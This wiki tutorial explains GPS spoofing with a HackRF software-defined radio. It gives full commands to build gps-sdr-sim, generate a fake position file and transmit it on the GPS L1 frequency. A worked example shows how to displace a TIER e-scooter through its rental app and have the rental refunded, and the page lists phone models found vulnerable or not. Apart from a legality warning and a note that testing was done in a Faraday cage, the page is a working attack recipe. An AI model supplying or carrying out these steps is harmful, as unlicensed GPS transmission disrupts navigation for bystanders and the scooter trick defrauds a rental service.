Tutorials/GPS Spoofing/Hardware

From Teilen macht Spass!
Jump to navigation Jump to search


Using Software Defied Radio (SDR) to simulate GPS signals.

NOTE: THIS IS POSSIBLY NOT ALLOWED IN YOUR COUNTRY FOR GOOD REASONS

Prerequisites

Hardware

  • computer with linux (Debian) or OSX(?)
  • SDR transceiver capable of transmitting on > 1500Mhz (USRP, HackRF, BladeRF, LimeSDR, LimeSDR Mini, PlutoSDR)

Software

  • gps_sdr_sim


Installation (Debian)

Generating GPS Signal using HackRF and Debian

Adding HackRF Support

$ sudo apt-update
$ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev

Hook up your HackRF and see if its recognized:

$ hackrf_info

You should see something like:

Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2015.07.2
Part ID Number: 0xa000cw898 0x09898908  (redacted)
Serial Number: 000000000 0000 00 00000000 (redacted

GPS sim (Download + compile)

$ git clone https://github.com/osqzss/gps-sdr-sim.git
$ cd gps-sdr-sim
$ make


Making gps sim only takes a few seconds.


Generate simulated motion file

Download the latest brdc file from here: [1](ftp://cddis.gsfc.nasa.gov/gnss/data/daily) (for example: ftp://cddis.gsfc.nasa.gov/gnss/data/daily/2020/brdc/brdc1460.20g.Z)

Extract the compressed file in a place you will remember

Generate binary file to be transmitted by hackrf:


$ ./gps-sdr-sim -b 8 -e ~/LOCATION_OF_YOUR_BRDC/brdc1460.20n -l 45.803304,12.133697,100  


The default option generates a 300sec (5 min) 'motion' file. This can be increased by using using the '-d' option. The last part is the location of your choosing (lat, long, altitude). This will run for 300 seconds and generate a 'gpssim.bin' file. **NOTE** the lat/long/alt should not contain any spaces, only commas.


Spoof location

To transmit your spoofed gps position using the hackrf use the follwing command:


$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 


The motion file only simulates for a given period (-d), luckily hackrf_transfer can repeat the transmission with the '-R' switch! 
$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 -R

(see: https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf)

Installing on Arch

You could build gps-sdr-sim from scratch (very quick, recommended), but I choose to use the binary provided by the 'blackarch' distro's repository.

Prerequisites
$ curl -O https://blackarch.org/strap.sh  
$ chmod +x strap.sh
$ sudo ./strap.sh (installing the keyring step takes a few minutes)
$ sudo pacman -Syyu (update pacman sources etc. although stap.sh already seems to take care of this)
$ sudo pacman -S blackarch-radio (just install all the radio stuff (1Gb))
$ sudo modprobe hackrf (load the hackrf kernel module/driver)
$ hackrf_info  (see if you can see your hack rf one)



Example 1: Displacing a Tier E-Scooter

Disclaimer: tested in faraday cage, not in public

Workflow:

  1. Generate motion file for a position WITHIN the service area of TIER
  2. Transfer using HackRF
  3. Wait until you phone is displaced according to the simulated motion
  4. Open the TIER.app and Rent a scooter in your vicinity
  5. The moment you rent it the scooter will be displaced
  6. Immediately end the rental, the scooter will remain displaced and your money refunded

Observations

  • You can only spoof location within the service area and current city.

* Although there is a GPS antenna in the scooter, only the user's phone GPS is used. * The location is only updated by people renting it. Nope, its constantly updating

Caveats

Newer devices such as iPhone 10 can not be spoofed (yet). It seems they noy only us GPS (US) but also other posititioning systems on different frequencies: Galileo (EU), GLONASS (RU) (and BeidDou (CN)?). Vulnerable devices tested (no need to switch of wifi, gsm etc, works out of the box):

  • iPhone 6, running iOS 12.4.4
  • Samsung s10e, running Anroid 10

Not Vulnerable (also not with wifi disabled):

  • iPhone SE (2nd gen)
  • iPhone X

Improvements / Troubleshooting